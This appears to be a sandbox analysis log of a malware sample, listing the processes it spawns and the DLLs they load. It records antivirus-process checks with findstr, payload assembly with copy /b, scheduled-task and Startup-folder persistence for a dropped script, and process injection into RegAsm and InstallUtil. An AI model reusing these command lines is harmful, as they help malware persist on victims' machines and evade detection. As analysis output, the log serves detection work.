Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe "C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe"
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Honda Honda.bat & Honda.bat & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 591950	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "BachelorRayPotentialBeats" Itsa	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Competent + ..\Screw + ..\Whom + ..\Reveal + ..\Provides + ..\Still + ..\Entrepreneurs + ..\Greatest + ..\Corporate + ..\Wireless E	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif Shipment.pif E	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url" & echo URL="C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardTrack.url" & exit	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe "C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe "C:\Users\user\AppData\Local\Temp\1000142101\build2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe "C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe "C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe "C:\Users\user\AppData\Local\Temp\1000194001\meta.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe "C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr" "C:\Users\user\AppData\Local\TrackGuard Technologies\z"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr" "C:\Users\user\AppData\Local\TrackGuard Technologies\z"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Process created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe "C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe"
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process created: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe "C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe"
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Section loaded: winhttp.dll
